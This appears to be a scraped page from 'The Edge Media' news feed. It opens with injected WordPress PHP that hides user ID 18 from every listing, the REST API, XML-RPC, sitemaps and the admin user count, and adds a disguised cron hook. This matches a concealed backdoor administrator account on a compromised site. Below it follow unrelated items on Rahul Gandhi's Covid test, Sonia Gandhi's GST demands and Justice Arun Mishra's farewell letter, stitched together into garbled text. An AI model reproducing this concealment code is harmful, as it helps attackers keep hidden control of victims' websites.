add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Rahul Gandhi tested Corona positive… appeared first on The Edge Media.
]]>He has advised people seeking contact with people who have contacted him in the past. He announced on Twitter that he had mild symptoms of corona. Rahul Gandhi tweeted,
“After experiencing mild symptoms, my covid test has come back positive. All those who are in contact with me, please follow all safety protocols and be safe.”
The former Congress president campaigned extensively in Kerala and Tamil Nadu for the assembly elections.
He started his campaign in West Bengal after four rounds of polling, but stopped his campaign midway as the covid-19 cases intensified.
He said, “In view of the situation of covid, I am suspending all my public rallies in West Bengal.
I would advise all political leaders to think deeply about the consequences of holding large public rallies under the prevailing circumstances.
The post Rahul Gandhi tested Corona positive… appeared first on The Edge Media.
]]>The post Sonia’s demand to government deposit 6 thousand in the account of the needy appeared first on The Edge Media.
]]>
To be vaccinated on priority basis. He also said in a meeting of the Congress Working Committee (CWC) that the government should exempt GST from medical devices and medicines needed to deal with corona, and take strict measures to curb the spread of corona virus infection. The help of six thousand rupees should be provided.
He said that it is a matter of great concern that GST of 12 per cent has been imposed on basic needs like life saving medicines like Remedisvir and Medical Oxygen, even the rate of GST on oximeters and ventilators is 20 per cent.
Sonia Gandhi said, “During the conversation with me, our Chief Ministers believed that the things used in the treatment and prevention of virus infection should be exempted from the purview of GST.”
Expressing grief over the large number of people being hit by Corona virus infection and the death of hundreds of people daily, the Congress salutes the health workers and other employees who are doing their duty in the hour of this crisis.
He referred to a letter to Prime Minister Narendra Modi and alleged that there is a shortage of vaccines, oxygen and ventilators in many places, but the government is silent.
The Congress president said, “The government should reconsider its priority for vaccination and reduce the age limit to 25 years. All the youth suffering from asthma, diabetes, kidney and liver diseases should be vaccinated. ”It is noteworthy that the minimum age limit for vaccination is 45 years.
The post Sonia’s demand to government deposit 6 thousand in the account of the needy appeared first on The Edge Media.
]]>The post SC Judge Justice Arun Mishra, “My Conscience Does Not Permit Me To Participate In Any Farewell Function.” appeared first on The Edge Media.
]]>Justice Mishra, who became an apex court judge on July 7, 2014, is demitting office on Tuesday and is all set to pronounce key judgments in cases including timelines for payment of AGR dues by telcos and the award of punishment to activist-lawyer Prashant Bhushan in a contempt case.
The Supreme Court Bar Association and the Confederation of Indian Bar have extended the invitations for the farewell functions to the outgoing judge.
“I am grateful for your kind invitation inviting me in the farewell function… I have always considered the bar as the mother of the judiciary, and it would have been a great pleasure to attend said function.
“However, taking into consideration the severe situation and sufferings the world over on account of the COVID-19 pandemic, my conscience does not permit me to participate in any farewell function,” Justice Mishra wrote to the bar bodies declining the requests. He, however, assured the bar bodies that he would visit them as and when the situation normalizes.
– PTI
The post SC Judge Justice Arun Mishra, “My Conscience Does Not Permit Me To Participate In Any Farewell Function.” appeared first on The Edge Media.
]]>